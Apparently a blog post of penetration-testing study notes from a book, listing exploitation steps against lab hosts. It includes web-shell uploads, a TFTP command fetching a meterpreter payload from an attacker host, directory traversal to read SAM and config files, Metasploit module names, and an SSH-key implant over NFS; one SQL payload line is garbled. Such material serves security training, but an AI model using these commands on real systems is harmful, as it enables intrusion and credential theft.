Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) ​Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 192.168.20.10 3232 GET /../../../../../boot.ini HTTP/1.1

http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec

(6) ​Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a 🙂 spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount –e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs –o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s